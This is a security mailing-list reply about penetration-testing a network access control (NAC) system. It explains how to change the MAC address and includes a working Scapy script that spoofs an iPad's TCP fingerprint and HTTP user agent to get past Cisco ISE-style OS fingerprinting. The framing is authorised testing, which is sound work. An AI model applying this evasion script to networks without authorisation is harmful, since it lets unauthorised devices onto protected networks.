> > As I asked about recently, I'll soon be testing a NAC type device and so I
> > was wondering, is there a tool which will let me watch a device then clone
> > its network fingerprint? By fingerprint I mean things like network settings
> > such as TTLs but also open ports (probably couldn't spoof the service but
> > at least open the port).
> >
> > I know there is a tool that is designed to fool attackers by having a list
> > of different OS's and you chose which you want to pretend to be but rather
> > than pick from a list I want to be able to point it at another machine and
> > say "clone that".
>
> What do you do for IP? Do you work out what is on the network through passive
> observation and then pick something that looks appropriate?
>
> Any other suggestions on testing/avoiding NAC? I've not tested with one in
> action before and don't have anything to practice against. This particular
> test is to see if it is doing its job properly so specifics on testing a NAC
> would be good.
When I'm testing a NAC system I connect with a standard Windows or OS X client
first, and explore what's accessible, trying to identify the NAC vendor. From
there I'll do some passive analysis, and try to determine if there are any
exception policies applied (such as a rule for iPad's not having to
authenticate, etc.)
NAC vendors commonly perform OS fingerprinting to identify devices, and
products like Cisco ISE use the fingerprints to apply rules to devices. They
can't continually fingerprint the devices though, so they perform an initial
analysis, and then subsequent analysis per the NAC configuration (IIRC, Cisco
ISE's re-check interval has a minimum delay of 15 minutes, with a default of
"check once"). I'll typically change my MAC to get another IP, and use Scapy
to complete a 3-way handshake to any accessible host, just to trick the OS
fingerprinting rule (Cisco ISE checks TCP option parameters including order of
options, which is hard to spoof on Linux, and impossible on Windows, but Scapy
does it just fine). Here is a sample script I have laying around:
#!/usr/bin/python
from scapy.all import *
DSTIP="10.10.10.110" # Specify your target where NAC will observe it
SPORT=RandNum(1024,65535)
ip=IP(dst=DSTIP, flags="DF", ttl=64)
tcpopt = [ ("MSS",1460), ("NOP",None), ("WScale",2), ("NOP",None),
("NOP",None), ("Timestamp",(123,0)), ("SAckOK",""), ("EOL",None) ]
SYN=TCP(sport=SPORT, dport=80, flags="S", seq=10, window=0xffff, options=tcpopt)
SYNACK=sr1(ip/SYN) # Send the packet and record the response as SYNACK
my_ack = SYNACK.seq + 1 # Use the SYN/ACK response to get initial seq. number
ACK=TCP(sport=SPORT, dport=80, flags="A", seq=11, ack=my_ack, window=0xffff)
send(ip/ACK)
data = "GET / HTTP/1.1\r\nHost: " + DSTIP + "\r\nMozilla/5.0 (iPad; CPU OS 5_0
like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 [...]\r\n\r\n"
PUSH=TCP(sport=SPORT,dport=80, flags="PA", seq=11, ack=my_ack, window=0xffff)
send(ip/PUSH/data)
RST=TCP(sport=SPORT,dport=80, flags="R", seq=11, ack=0, window=0xffff)
send(ip/RST)
Before you use this script, make sure you apply an iptables rule to stop the
Linux native stack from sending a TCP RST to the spoofed TCP SYN.
After I get some of this traffic through, I do some more testing to see what my
connectivity looks like with netcat or manual Scapy connections.
HTH,
-Josh
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
